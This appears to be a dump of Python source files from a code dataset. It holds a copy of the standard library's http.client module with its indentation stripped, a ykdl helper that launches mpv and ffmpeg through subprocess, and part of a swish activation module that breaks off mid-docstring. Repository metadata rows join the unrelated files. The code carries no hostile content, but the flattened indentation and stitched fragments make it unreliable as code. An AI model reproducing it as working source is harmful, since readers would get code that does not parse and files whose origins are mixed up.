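#
#   >>> import io
#   >>> fp = io.BytesIO(b"Host: example.com\r\nAccept: */*\r\n\r\n")
#   >>> msg = parse_headers(fp)
#   >>> msg["Host"]
#   'example.com'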
class HTTPResponse(io.BufferedIOBase):
# See RFC 2616 sec 19.6 and RFC 1945 sec 6 for details.
# The bytes from the socket object are iso-8859-1 strings.
# See RFC 2616 sec 2.2 which notes an exception for MIME-encoded
# text following RFC 2047. The basic status line parsing only
# accepts iso-8859-1.
def __init__(self, sock, debuglevel=0, method=None, url=None):
# If the response includes a content-length header, we need to
# make sure that the client doesn't read more than the
# specified number of bytes. If it does, it will block until
# the server times out and closes the connection. This will
# happen if a self.fp.read() is done (without a size) whether
# self.fp is buffered or not. So, no self.fp.read() by
# clients unless they know what they are doing.
self.fp = sock.makefile("rb")
self.debuglevel = debuglevel
self._method = method
# The HTTPResponse object is returned via urllib. The clients
# of http and urllib expect different attributes for the
# headers. headers is used here and supports urllib. msg is
# provided as a backwards compatibility layer for http
# clients.
self.headers = self.msg = None
# from the Status-Line of the response
self.version = _UNKNOWN # HTTP-Version
self.status = _UNKNOWN # Status-Code
self.reason = _UNKNOWN # Reason-Phrase
self.chunked = _UNKNOWN # is "chunked" being used?
self.chunk_left = _UNKNOWN # bytes left to read in current chunk
self.length = _UNKNOWN # number of bytes left in response
self.will_close = _UNKNOWN # conn will close at end of response
def _read_status(self):
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
if len(line) > _MAXLINE:
raise LineTooLong("status line")
if self.debuglevel > 0:
print("reply:", repr(line))
if not line:
# Presumably, the server closed the connection before
# sending a valid response.
raise RemoteDisconnected("Remote end closed connection without"
" response")
try:
version, status, reason = line.split(None, 2)
except ValueError:
try:
version, status = line.split(None, 1)
reason = ""
except ValueError:
# empty version will cause next test to fail.
version = ""
if not version.startswith("HTTP/"):
self._close_conn()
raise BadStatusLine(line)
# The status code is a three-digit number
try:
status = int(status)
if status < 100 or status > 999:
raise BadStatusLine(line)
except ValueError:
raise BadStatusLine(line)
return version, status, reason
def begin(self):
if self.headers is not None:
# we've already started reading the response
return
# read until we get a non-100 response
while True:
version, status, reason = self._read_status()
if status != CONTINUE:
break
# skip the header from the 100 response
while True:
skip = self.fp.readline(_MAXLINE + 1)
if len(skip) > _MAXLINE:
raise LineTooLong("header line")
skip = skip.strip()
if not skip:
break
if self.debuglevel > 0:
print("header:", skip)
self.code = self.status = status
self.reason = reason.strip()
if version in ("HTTP/1.0", "HTTP/0.9"):
# Some servers might still return "0.9", treat it as 1.0 anyway
self.version = 10
elif version.startswith("HTTP/1."):
self.version = 11 # use HTTP/1.1 code for HTTP/1.x where x>=1
else:
raise UnknownProtocol(version)
self.headers = self.msg = parse_headers(self.fp)
if self.debuglevel > 0:
for hdr in self.headers:
print("header:", hdr, end=" ")
# are we using the chunked-style of transfer encoding?
tr_enc = self.headers.get("transfer-encoding")
if tr_enc and tr_enc.lower() == "chunked":
self.chunked = True
self.chunk_left = None
else:
self.chunked = False
# will the connection close at the end of the response?
self.will_close = self._check_close()
# do we have a Content-Length?
# NOTE: RFC 2616, S4.4, #3 says we ignore this if tr_enc is "chunked"
self.length = None
length = self.headers.get("content-length")
# are we using the chunked-style of transfer encoding?
tr_enc = self.headers.get("transfer-encoding")
if length and not self.chunked:
try:
self.length = int(length)
except ValueError:
self.length = None
else:
if self.length < 0: # ignore nonsensical negative lengths
self.length = None
else:
self.length = None
# does the body have a fixed length? (of zero)
if (status == NO_CONTENT or status == NOT_MODIFIED or
100 <= status < 200 or # 1xx codes
self._method == "HEAD"):
self.length = 0
# if the connection remains open, and we aren't using chunked, and
# a content-length was not provided, then assume that the connection
# WILL close.
if (not self.will_close and
not self.chunked and
self.length is None):
self.will_close = True
def _check_close(self):
conn = self.headers.get("connection")
if self.version == 11:
# An HTTP/1.1 proxy is assumed to stay open unless
# explicitly closed.
conn = self.headers.get("connection")
if conn and "close" in conn.lower():
return True
return False
# Some HTTP/1.0 implementations have support for persistent
# connections, using rules different than HTTP/1.1.
# For older HTTP, Keep-Alive indicates persistent connection.
if self.headers.get("keep-alive"):
return False
# At least Akamai returns a "Connection: Keep-Alive" header,
# which was supposed to be sent by the client.
if conn and "keep-alive" in conn.lower():
return False
# Proxy-Connection is a netscape hack.
pconn = self.headers.get("proxy-connection")
if pconn and "keep-alive" in pconn.lower():
return False
# otherwise, assume it will close
return True
def _close_conn(self):
fp = self.fp
self.fp = None
fp.close()
def close(self):
try:
super().close() # set "closed" flag
finally:
if self.fp:
self._close_conn()
# These implementations are for the benefit of io.BufferedReader.
# XXX This class should probably be revised to act more like
# the "raw stream" that BufferedReader expects.
def flush(self):
super().flush()
if self.fp:
self.fp.flush()
def readable(self):
return True
# End of "raw stream" methods
def isclosed(self):
"""True if the connection is closed."""
# NOTE: it is possible that we will not ever call self.close(). This
# case occurs when will_close is TRUE, length is None, and we
# read up to the last byte, but NOT past it.
#
# IMPLIES: if will_close is FALSE, then self.close() will ALWAYS be
# called, meaning self.isclosed() is meaningful.
return self.fp is None
def read(self, amt=None):
if self.fp is None:
return b""
if self._method == "HEAD":
self._close_conn()
return b""
if amt is not None:
# Amount is given, implement using readinto
b = bytearray(amt)
n = self.readinto(b)
return memoryview(b)[:n].tobytes()
else:
# Amount is not given (unbounded read) so we must check self.length
# and self.chunked
if self.chunked:
return self._readall_chunked()
if self.length is None:
s = self.fp.read()
else:
try:
s = self._safe_read(self.length)
except IncompleteRead:
self._close_conn()
raise
self.length = 0
self._close_conn() # we read everything
return s
def readinto(self, b):
if self.fp is None:
return 0
if self._method == "HEAD":
self._close_conn()
return 0
if self.chunked:
return self._readinto_chunked(b)
if self.length is not None:
if len(b) > self.length:
# clip the read to the "end of response"
b = memoryview(b)[0:self.length]
# we do not use _safe_read() here because this may be a .will_close
# connection, and the user is reading more bytes than will be provided
# (for example, reading in 1k chunks)
n = self.fp.readinto(b)
if not n and b:
# Ideally, we would raise IncompleteRead if the content-length
# wasn't satisfied, but it might break compatibility.
self._close_conn()
elif self.length is not None:
self.length -= n
if not self.length:
self._close_conn()
return n
def _read_next_chunk_size(self):
# Read the next chunk size from the file
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("chunk size")
i = line.find(b";")
if i >= 0:
line = line[:i] # strip chunk-extensions
try:
return int(line, 16)
except ValueError:
# close the connection as protocol synchronisation is
# probably lost
self._close_conn()
raise
def _read_and_discard_trailer(self):
# read and discard trailer up to the CRLF terminator
### note: we shouldn't have any trailers!
while True:
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("trailer line")
if not line:
# a vanishingly small number of sites EOF without
# sending the trailer
break
if line in (b'\r\n', b'\n', b''):
break
def _get_chunk_left(self):
# return self.chunk_left, reading a new chunk if necessary.
# chunk_left == 0: at the end of the current chunk, need to close it
# chunk_left == None: No current chunk, should read next.
# This function returns non-zero or None if the last chunk has
# been read.
chunk_left = self.chunk_left
if not chunk_left: # Can be 0 or None
if chunk_left is not None:
                # We are at the end of a chunk. Discard the chunk end
self._safe_read(2) # toss the CRLF at the end of the chunk
try:
chunk_left = self._read_next_chunk_size()
except ValueError:
raise IncompleteRead(b'')
if chunk_left == 0:
# last chunk: 1*("0") [ chunk-extension ] CRLF
self._read_and_discard_trailer()
# we read everything; close the "file"
self._close_conn()
chunk_left = None
self.chunk_left = chunk_left
return chunk_left
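    # Illustrative chunked body (see RFC 7230, sec. 4.1) as consumed above:
    #
    #   4\r\n        <- _read_next_chunk_size() returns 4
    #   Wiki\r\n     <- 4 data bytes; the trailing CRLF is tossed by _safe_read(2)
    #   0\r\n        <- size 0: last chunk, trailer is read and discarded
    #   \r\n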
def _readall_chunked(self):
assert self.chunked != _UNKNOWN
value = []
try:
while True:
chunk_left = self._get_chunk_left()
if chunk_left is None:
break
value.append(self._safe_read(chunk_left))
self.chunk_left = 0
return b''.join(value)
except IncompleteRead:
raise IncompleteRead(b''.join(value))
def _readinto_chunked(self, b):
assert self.chunked != _UNKNOWN
total_bytes = 0
mvb = memoryview(b)
try:
while True:
chunk_left = self._get_chunk_left()
if chunk_left is None:
return total_bytes
if len(mvb) <= chunk_left:
n = self._safe_readinto(mvb)
self.chunk_left = chunk_left - n
return total_bytes + n
temp_mvb = mvb[:chunk_left]
n = self._safe_readinto(temp_mvb)
mvb = mvb[n:]
total_bytes += n
self.chunk_left = 0
except IncompleteRead:
raise IncompleteRead(bytes(b[0:total_bytes]))
def _safe_read(self, amt):
"""Read the number of bytes requested, compensating for partial reads.
Normally, we have a blocking socket, but a read() can be interrupted
by a signal (resulting in a partial read).
Note that we cannot distinguish between EOF and an interrupt when zero
bytes have been read. IncompleteRead() will be raised in this
situation.
This function should be used when <amt> bytes "should" be present for
reading. If the bytes are truly not available (due to EOF), then the
IncompleteRead exception can be used to detect the problem.
"""
s = []
while amt > 0:
chunk = self.fp.read(min(amt, MAXAMOUNT))
if not chunk:
raise IncompleteRead(b''.join(s), amt)
s.append(chunk)
amt -= len(chunk)
return b"".join(s)
def _safe_readinto(self, b):
"""Same as _safe_read, but for reading into a buffer."""
total_bytes = 0
mvb = memoryview(b)
while total_bytes < len(b):
if MAXAMOUNT < len(mvb):
temp_mvb = mvb[0:MAXAMOUNT]
n = self.fp.readinto(temp_mvb)
else:
n = self.fp.readinto(mvb)
if not n:
raise IncompleteRead(bytes(mvb[0:total_bytes]), len(b))
mvb = mvb[n:]
total_bytes += n
return total_bytes
def read1(self, n=-1):
"""Read with at most one underlying system call. If at least one
byte is buffered, return that instead.
"""
if self.fp is None or self._method == "HEAD":
return b""
if self.chunked:
return self._read1_chunked(n)
if self.length is not None and (n < 0 or n > self.length):
n = self.length
try:
result = self.fp.read1(n)
except ValueError:
if n >= 0:
raise
# some implementations, like BufferedReader, don't support -1
# Read an arbitrarily selected largeish chunk.
result = self.fp.read1(16*1024)
if not result and n:
self._close_conn()
elif self.length is not None:
self.length -= len(result)
return result
def peek(self, n=-1):
# Having this enables IOBase.readline() to read more than one
# byte at a time
if self.fp is None or self._method == "HEAD":
return b""
if self.chunked:
return self._peek_chunked(n)
return self.fp.peek(n)
def readline(self, limit=-1):
if self.fp is None or self._method == "HEAD":
return b""
if self.chunked:
# Fallback to IOBase readline which uses peek() and read()
return super().readline(limit)
if self.length is not None and (limit < 0 or limit > self.length):
limit = self.length
result = self.fp.readline(limit)
if not result and limit:
self._close_conn()
elif self.length is not None:
self.length -= len(result)
return result
def _read1_chunked(self, n):
# Strictly speaking, _get_chunk_left() may cause more than one read,
# but that is ok, since that is to satisfy the chunked protocol.
chunk_left = self._get_chunk_left()
if chunk_left is None or n == 0:
return b''
if not (0 <= n <= chunk_left):
n = chunk_left # if n is negative or larger than chunk_left
read = self.fp.read1(n)
self.chunk_left -= len(read)
if not read:
raise IncompleteRead(b"")
return read
def _peek_chunked(self, n):
# Strictly speaking, _get_chunk_left() may cause more than one read,
# but that is ok, since that is to satisfy the chunked protocol.
try:
chunk_left = self._get_chunk_left()
except IncompleteRead:
return b'' # peek doesn't worry about protocol
if chunk_left is None:
return b'' # eof
# peek is allowed to return more than requested. Just request the
# entire chunk, and truncate what we get.
return self.fp.peek(chunk_left)[:chunk_left]
def fileno(self):
return self.fp.fileno()
def getheader(self, name, default=None):
if self.headers is None:
raise ResponseNotReady()
headers = self.headers.get_all(name) or default
if isinstance(headers, str) or not hasattr(headers, '__iter__'):
return headers
else:
return ', '.join(headers)
def getheaders(self):
"""Return list of (header, value) tuples."""
if self.headers is None:
raise ResponseNotReady()
return list(self.headers.items())
# We override IOBase.__iter__ so that it doesn't check for closed-ness
def __iter__(self):
return self
# For compatibility with old-style urllib responses.
def info(self):
return self.headers
def geturl(self):
return self.url
def getcode(self):
return self.status
class HTTPConnection:
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
def __init__(self, host, port=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
self.timeout = timeout
self.source_address = source_address
self.sock = None
self._buffer = []
self.__response = None
self.__state = _CS_IDLE
self._method = None
self._tunnel_host = None
self._tunnel_port = None
self._tunnel_headers = {}
(self.host, self.port) = self._get_hostport(host, port)
# This is stored as an instance variable to allow unit
# tests to replace it with a suitable mockup
self._create_connection = socket.create_connection
def set_tunnel(self, host, port=None, headers=None):
"""Set up host and port for HTTP CONNECT tunnelling.
In a connection that uses HTTP CONNECT tunneling, the host passed to the
constructor is used as a proxy server that relays all communication to
        the endpoint passed to `set_tunnel`. This is done by sending an HTTP
CONNECT request to the proxy server when the connection is established.
        This method must be called before the HTTP connection has been
established.
The headers argument should be a mapping of extra HTTP headers to send
with the CONNECT request.
"""
if self.sock:
raise RuntimeError("Can't set up tunnel for established connection")
self._tunnel_host, self._tunnel_port = self._get_hostport(host, port)
if headers:
self._tunnel_headers = headers
else:
self._tunnel_headers.clear()
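    # A minimal tunnelling sketch (illustrative; "proxy.example:3128" is a
    # placeholder for a CONNECT-capable proxy):
    #
    #   >>> conn = HTTPSConnection("proxy.example", 3128)
    #   >>> conn.set_tunnel("www.example.com", 443)
    #   >>> conn.request("GET", "/")   # CONNECT is sent when connect() runs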
def _get_hostport(self, host, port):
if port is None:
i = host.rfind(':')
j = host.rfind(']') # ipv6 addresses have [...]
if i > j:
try:
port = int(host[i+1:])
except ValueError:
if host[i+1:] == "": # http://foo.com:/ == http://foo.com/
port = self.default_port
else:
raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
host = host[:i]
else:
port = self.default_port
if host and host[0] == '[' and host[-1] == ']':
host = host[1:-1]
return (host, port)
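    # Illustrative results of the parsing above (with default_port == 80):
    #   'www.example.com'       -> ('www.example.com', 80)
    #   'www.example.com:8080'  -> ('www.example.com', 8080)
    #   '[::1]:8000'            -> ('::1', 8000)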
def set_debuglevel(self, level):
self.debuglevel = level
def _tunnel(self):
connect_str = "CONNECT %s:%d HTTP/1.0\r\n" % (self._tunnel_host,
self._tunnel_port)
connect_bytes = connect_str.encode("ascii")
self.send(connect_bytes)
for header, value in self._tunnel_headers.items():
header_str = "%s: %s\r\n" % (header, value)
header_bytes = header_str.encode("latin-1")
self.send(header_bytes)
self.send(b'\r\n')
response = self.response_class(self.sock, method=self._method)
(version, code, message) = response._read_status()
if code != http.HTTPStatus.OK:
self.close()
raise OSError("Tunnel connection failed: %d %s" % (code,
message.strip()))
while True:
line = response.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("header line")
if not line:
# for sites which EOF without sending a trailer
break
if line in (b'\r\n', b'\n', b''):
break
if self.debuglevel > 0:
print('header:', line.decode())
def connect(self):
"""Connect to the host and port specified in __init__."""
self.sock = self._create_connection(
(self.host,self.port), self.timeout, self.source_address)
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if self._tunnel_host:
self._tunnel()
def close(self):
"""Close the connection to the HTTP server."""
self.__state = _CS_IDLE
try:
sock = self.sock
if sock:
self.sock = None
sock.close() # close it manually... there may be other refs
finally:
response = self.__response
if response:
self.__response = None
response.close()
def send(self, data):
"""Send `data' to the server.
``data`` can be a string object, a bytes object, an array object, a
file-like object that supports a .read() method, or an iterable object.
"""
if self.sock is None:
if self.auto_open:
self.connect()
else:
raise NotConnected()
if self.debuglevel > 0:
print("send:", repr(data))
blocksize = 8192
if hasattr(data, "read") :
if self.debuglevel > 0:
print("sendIng a read()able")
encode = False
try:
mode = data.mode
except AttributeError:
# io.BytesIO and other file-like objects don't have a `mode`
# attribute.
pass
else:
if "b" not in mode:
encode = True
if self.debuglevel > 0:
print("encoding file using iso-8859-1")
while 1:
datablock = data.read(blocksize)
if not datablock:
break
if encode:
datablock = datablock.encode("iso-8859-1")
self.sock.sendall(datablock)
return
try:
self.sock.sendall(data)
except TypeError:
if isinstance(data, collections.Iterable):
for d in data:
self.sock.sendall(d)
else:
raise TypeError("data should be a bytes-like object "
"or an iterable, got %r" % type(data))
def _output(self, s):
"""Add a line of output to the current request buffer.
Assumes that the line does *not* end with \\r\\n.
"""
self._buffer.append(s)
def _send_output(self, message_body=None):
"""Send the currently buffered request and clear the buffer.
Appends an extra \\r\\n to the buffer.
A message_body may be specified, to be appended to the request.
"""
self._buffer.extend((b"", b""))
msg = b"\r\n".join(self._buffer)
del self._buffer[:]
self.send(msg)
if message_body is not None:
self.send(message_body)
def putrequest(self, method, url, skip_host=0, skip_accept_encoding=0):
"""Send a request to the server.
`method' specifies an HTTP request method, e.g. 'GET'.
`url' specifies the object being requested, e.g. '/index.html'.
`skip_host' if True does not add automatically a 'Host:' header
`skip_accept_encoding' if True does not add automatically an
'Accept-Encoding:' header
"""
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
# in certain cases, we cannot issue another request on this connection.
# this occurs when:
# 1) we are in the process of sending a request. (_CS_REQ_STARTED)
# 2) a response to a previous request has signalled that it is going
# to close the connection upon completion.
# 3) the headers for the previous response have not been read, thus
# we cannot determine whether point (2) is true. (_CS_REQ_SENT)
#
# if there is no prior response, then we can request at will.
#
# if point (2) is true, then we will have passed the socket to the
# response (effectively meaning, "there is no prior response"), and
# will open a new one when a new request is made.
#
# Note: if a prior response exists, then we *can* start a new request.
# We are not allowed to begin fetching the response to this new
# request, however, until that prior response is complete.
#
if self.__state == _CS_IDLE:
self.__state = _CS_REQ_STARTED
else:
raise CannotSendRequest(self.__state)
# Save the method we use, we need it later in the response phase
self._method = method
if not url:
url = '/'
request = '%s %s %s' % (method, url, self._http_vsn_str)
# Non-ASCII characters should have been eliminated earlier
self._output(request.encode('ascii'))
if self._http_vsn == 11:
# Issue some standard headers for better HTTP/1.1 compliance
if not skip_host:
# this header is issued *only* for HTTP/1.1
# connections. more specifically, this means it is
# only issued when the client uses the new
# HTTPConnection() class. backwards-compat clients
# will be using HTTP/1.0 and those clients may be
# issuing this header themselves. we should NOT issue
# it twice; some web servers (such as Apache) barf
# when they see two Host: headers
# If we need a non-standard port,include it in the
# header. If the request is going through a proxy,
# but the host of the actual URL, not the host of the
# proxy.
netloc = ''
if url.startswith('http'):
nil, netloc, nil, nil, nil = urlsplit(url)
if netloc:
try:
netloc_enc = netloc.encode("ascii")
except UnicodeEncodeError:
netloc_enc = netloc.encode("idna")
self.putheader('Host', netloc_enc)
else:
if self._tunnel_host:
host = self._tunnel_host
port = self._tunnel_port
else:
host = self.host
port = self.port
try:
host_enc = host.encode("ascii")
except UnicodeEncodeError:
host_enc = host.encode("idna")
                    # As per RFC 2732, IPv6 address should be wrapped with []
# when used as Host header
if host.find(':') >= 0:
host_enc = b'[' + host_enc + b']'
if port == self.default_port:
self.putheader('Host', host_enc)
else:
host_enc = host_enc.decode("ascii")
self.putheader('Host', "%s:%s" % (host_enc, port))
# note: we are assuming that clients will not attempt to set these
# headers since *this* library must deal with the
# consequences. this also means that when the supporting
# libraries are updated to recognize other forms, then this
# code should be changed (removed or updated).
# we only want a Content-Encoding of "identity" since we don't
# support encodings such as x-gzip or x-deflate.
if not skip_accept_encoding:
self.putheader('Accept-Encoding', 'identity')
# we can accept "chunked" Transfer-Encodings, but no others
# NOTE: no TE header implies *only* "chunked"
#self.putheader('TE', 'chunked')
# if TE is supplied in the header, then it must appear in a
# Connection header.
#self.putheader('Connection', 'TE')
else:
# For HTTP/1.0, the server will assume "not chunked"
pass
def putheader(self, header, *values):
"""Send a request header line to the server.
For example: h.putheader('Accept', 'text/html')
"""
if self.__state != _CS_REQ_STARTED:
raise CannotSendHeader()
if hasattr(header, 'encode'):
header = header.encode('ascii')
if not _is_legal_header_name(header):
raise ValueError('Invalid header name %r' % (header,))
values = list(values)
for i, one_value in enumerate(values):
if hasattr(one_value, 'encode'):
values[i] = one_value.encode('latin-1')
elif isinstance(one_value, int):
values[i] = str(one_value).encode('ascii')
if _is_illegal_header_value(values[i]):
raise ValueError('Invalid header value %r' % (values[i],))
value = b'\r\n\t'.join(values)
header = header + b': ' + value
self._output(header)
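        # e.g. h.putheader('X-Multi', 'a', 'b') emits the folded header
        #   X-Multi: a\r\n\tb
        # (multiple values are joined with CRLF + TAB, per the join above)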
def endheaders(self, message_body=None):
"""Indicate that the last header line has been sent to the server.
This method sends the request to the server. The optional message_body
argument can be used to pass a message body associated with the
request. The message body will be sent in the same packet as the
message headers if it is a string, otherwise it is sent as a separate
packet.
"""
if self.__state == _CS_REQ_STARTED:
self.__state = _CS_REQ_SENT
else:
raise CannotSendHeader()
self._send_output(message_body)
def request(self, method, url, body=None, headers={}):
"""Send a complete request to the server."""
self._send_request(method, url, body, headers)
def _set_content_length(self, body, method):
# Set the content-length based on the body. If the body is "empty", we
# set Content-Length: 0 for methods that expect a body (RFC 7230,
# Section 3.3.2). If the body is set for other methods, we set the
# header provided we can figure out what the length is.
thelen = None
method_expects_body = method.upper() in _METHODS_EXPECTING_BODY
if body is None and method_expects_body:
thelen = '0'
elif body is not None:
try:
thelen = str(len(body))
except TypeError:
# If this is a file-like object, try to
# fstat its file descriptor
try:
thelen = str(os.fstat(body.fileno()).st_size)
except (AttributeError, OSError):
# Don't send a length if this failed
if self.debuglevel > 0: print("Cannot stat!!")
if thelen is not None:
self.putheader('Content-Length', thelen)
def _send_request(self, method, url, body, headers):
# Honor explicitly requested Host: and Accept-Encoding: headers.
header_names = dict.fromkeys([k.lower() for k in headers])
skips = {}
if 'host' in header_names:
skips['skip_host'] = 1
if 'accept-encoding' in header_names:
skips['skip_accept_encoding'] = 1
self.putrequest(method, url, **skips)
if 'content-length' not in header_names:
self._set_content_length(body, method)
for hdr, value in headers.items():
self.putheader(hdr, value)
if isinstance(body, str):
# RFC 2616 Section 3.7.1 says that text default has a
# default charset of iso-8859-1.
body = _encode(body, 'body')
self.endheaders(body)
def getresponse(self):
"""Get the response from the server.
If the HTTPConnection is in the correct state, returns an
instance of HTTPResponse or of whatever object is returned by
the response_class variable.
If a request has not been sent or if a previous response has
not be handled, ResponseNotReady is raised. If the HTTP
response indicates that the connection should be closed, then
it will be closed before the response is returned. When the
connection is closed, the underlying socket is closed.
"""
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
# if a prior response exists, then it must be completed (otherwise, we
# cannot read this response's header to determine the connection-close
# behavior)
#
# note: if a prior response existed, but was connection-close, then the
# socket and response were made independent of this HTTPConnection
# object since a new request requires that we open a whole new
# connection
#
# this means the prior response had one of two states:
# 1) will_close: this connection was reset and the prior socket and
# response operate independently
# 2) persistent: the response was retained and we await its
# isclosed() status to become true.
#
if self.__state != _CS_REQ_SENT or self.__response:
raise ResponseNotReady(self.__state)
if self.debuglevel > 0:
response = self.response_class(self.sock, self.debuglevel,
method=self._method)
else:
response = self.response_class(self.sock, method=self._method)
try:
try:
response.begin()
except ConnectionError:
self.close()
raise
assert response.will_close != _UNKNOWN
self.__state = _CS_IDLE
if response.will_close:
# this effectively passes the connection to the response
self.close()
else:
# remember this, so we can tell when it is complete
self.__response = response
return response
except:
response.close()
raise
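# Illustrative usage of the request/response cycle implemented above (a
# hedged sketch, not part of the original module; the host name is an
# assumption chosen purely for illustration):
#
#   conn = HTTPConnection('example.com', 80)
#   conn.request('GET', '/', headers={'Accept': 'text/html'})
#   resp = conn.getresponse()   # read() the response before reusing conn
#   body = resp.read()
#   conn.close()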
try:
import ssl
except ImportError:
pass
else:
class HTTPSConnection(HTTPConnection):
"This class allows communication via SSL."
default_port = HTTPS_PORT
# XXX Should key_file and cert_file be deprecated in favour of context?
def __init__(self, host, port=None, key_file=None, cert_file=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None, *, context=None,
check_hostname=None):
super(HTTPSConnection, self).__init__(host, port, timeout,
source_address)
self.key_file = key_file
self.cert_file = cert_file
if context is None:
context = ssl._create_default_https_context()
will_verify = context.verify_mode != ssl.CERT_NONE
if check_hostname is None:
check_hostname = context.check_hostname
if check_hostname and not will_verify:
raise ValueError("check_hostname needs a SSL context with "
"either CERT_OPTIONAL or CERT_REQUIRED")
if key_file or cert_file:
context.load_cert_chain(cert_file, key_file)
self._context = context
self._check_hostname = check_hostname
def connect(self):
"Connect to a host on a given (SSL) port."
super().connect()
if self._tunnel_host:
server_hostname = self._tunnel_host
else:
server_hostname = self.host
self.sock = self._context.wrap_socket(self.sock,
server_hostname=server_hostname)
if not self._context.check_hostname and self._check_hostname:
try:
ssl.match_hostname(self.sock.getpeercert(), server_hostname)
except Exception:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
__all__.append("HTTPSConnection")
class HTTPException(Exception):
# Subclasses that define an __init__ must call Exception.__init__
# or define self.args. Otherwise, str() will fail.
pass
class NotConnected(HTTPException):
pass
class InvalidURL(HTTPException):
pass
class UnknownProtocol(HTTPException):
def __init__(self, version):
self.args = version,
self.version = version
class UnknownTransferEncoding(HTTPException):
pass
class UnimplementedFileMode(HTTPException):
pass
class IncompleteRead(HTTPException):
def __init__(self, partial, expected=None):
self.args = partial,
self.partial = partial
self.expected = expected
def __repr__(self):
if self.expected is not None:
e = ', %i more expected' % self.expected
else:
e = ''
return '%s(%i bytes read%s)' % (self.__class__.__name__,
len(self.partial), e)
def __str__(self):
return repr(self)
class ImproperConnectionState(HTTPException):
pass
class CannotSendRequest(ImproperConnectionState):
pass
class CannotSendHeader(ImproperConnectionState):
pass
class ResponseNotReady(ImproperConnectionState):
pass
class BadStatusLine(HTTPException):
def __init__(self, line):
if not line:
line = repr(line)
self.args = line,
self.line = line
class LineTooLong(HTTPException):
def __init__(self, line_type):
HTTPException.__init__(self, "got more than %d bytes when reading %s"
% (_MAXLINE, line_type))
class RemoteDisconnected(ConnectionResetError, BadStatusLine):
def __init__(self, *pos, **kw):
BadStatusLine.__init__(self, "")
ConnectionResetError.__init__(self, *pos, **kw)
# for backwards compatibility
error = HTTPException
| [
"[email protected]"
] | |
ca32ac6e38b9a3d4b55c6c625ef3bc8c727a7bb3 | 3c17e189622018329bc0ebd8523eae8db9f3112a | /ykdl/util/wrap.py | de6d61b463f96d1bc0bb8f01bef4d73c3470f3b0 | [
"MIT"
] | permissive | YU-zreo/ykdl | 167c9b8715a1cecf57c18bf60c7da3b22437ad06 | b59dacd78bcec79d208d7cb86b86fa65428e386a | refs/heads/master | 2020-12-02T12:47:01.113309 | 2017-07-07T12:39:20 | 2017-07-07T12:39:20 | 96,594,712 | 1 | 0 | null | 2017-07-08T03:57:22 | 2017-07-08T03:57:21 | null | UTF-8 | Python | false | false | 1,580 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import shlex
from logging import getLogger
logger = getLogger("wrap")
from ykdl.compact import compact_tempfile
def launch_player(player, urls, **args):
if 'mpv' in player:
cmd = shlex.split(player) + ['--demuxer-lavf-o=protocol_whitelist=[file,tcp,http]']
if args["ua"]:
cmd += ["--user-agent={}".format(args["ua"])]
if args["referer"]:
cmd += ["--referrer={}".format(args["referer"])]
cmd += list(urls)
else:
cmd = shlex.split(player) + list(urls)
subprocess.call(cmd)
def launch_ffmpeg(basename, ext, length):
    # Build the concat list file that ffmpeg reads its input segments from
    inputfile = compact_tempfile(mode='w+t', suffix='.txt', dir='.', encoding='utf-8')
    for i in range(length):
inputfile.write('file \'%s_%d_.%s\'\n' % (basename, i, ext))
inputfile.flush()
outputfile = basename+ '.' + ext
cmd = ['ffmpeg','-f', 'concat', '-safe', '-1', '-y', '-i', inputfile.name, '-c', 'copy', '-hide_banner']
if ext == 'mp4':
cmd += ['-absf', 'aac_adtstoasc']
cmd.append(outputfile)
print('Merging video %s using ffmpeg:' % basename)
subprocess.call(cmd)
def launch_ffmpeg_download(url, name, live):
print('Now downloading: %s' % name)
if live:
print('stop downloading by press \'q\'')
cmd = ['ffmpeg', '-y']
if not url.startswith('http'):
cmd += ['-protocol_whitelist', 'file,tcp,http' ]
cmd += ['-i', url, '-c', 'copy', '-absf', 'aac_adtstoasc', '-hide_banner', name]
subprocess.call(cmd)
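# Illustrative usage (a hedged sketch, not part of the original module; the
# player command and URLs are assumptions chosen purely for illustration):
#
#   launch_player('mpv', ['http://example.com/video.m3u8'],
#                 ua='Mozilla/5.0', referer='http://example.com/')
#   launch_ffmpeg_download('http://example.com/stream.flv', 'out.flv', live=False)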
| [
"[email protected]"
] | |
5a4d7837248354b88c88b465c3cbd58a4b15c328 | 0b1e404a165c960677d07015bc26aac0569cf84a | /src/combustion/nn/activations/swish.py | de70fb4f298b010d397300b048a83d7107bb6a6f | [
"Apache-2.0"
] | permissive | johndpope/combustion | d3ec349cd7be086f55b4e3deebd571c97842e1ed | c3f91e62a10a873cfeeae8c675b0683bc5158818 | refs/heads/master | 2023-03-01T14:34:42.149415 | 2021-02-07T17:55:58 | 2021-02-13T17:17:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,077 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
# implementation inspired by
# https://github.com/lukemelas/EfficientNet-PyTorch/blob/master/efficientnet_pytorch/utils.py
class _SwishFunction(torch.autograd.Function):
@staticmethod
def forward(ctx, i):
result = i * torch.sigmoid(i)
ctx.save_for_backward(i)
return result
@staticmethod
def backward(ctx, grad_output):
        # Recover the saved input and apply the analytic swish derivative:
        # d/dx[x * sigmoid(x)] = sigmoid(x) * (1 + x * (1 - sigmoid(x)))
        (i,) = ctx.saved_tensors
        sigmoid_i = torch.sigmoid(i)
        return grad_output * (sigmoid_i * (1 + i * (1 - sigmoid_i)))
def swish(inputs: Tensor, memory_efficient: bool = True) -> Tensor:
r"""The swish activation function, defined as
.. math::
f(x) = x \cdot \text{sigmoid}(x)
Args:
inputs (Tensor):
The input tensor
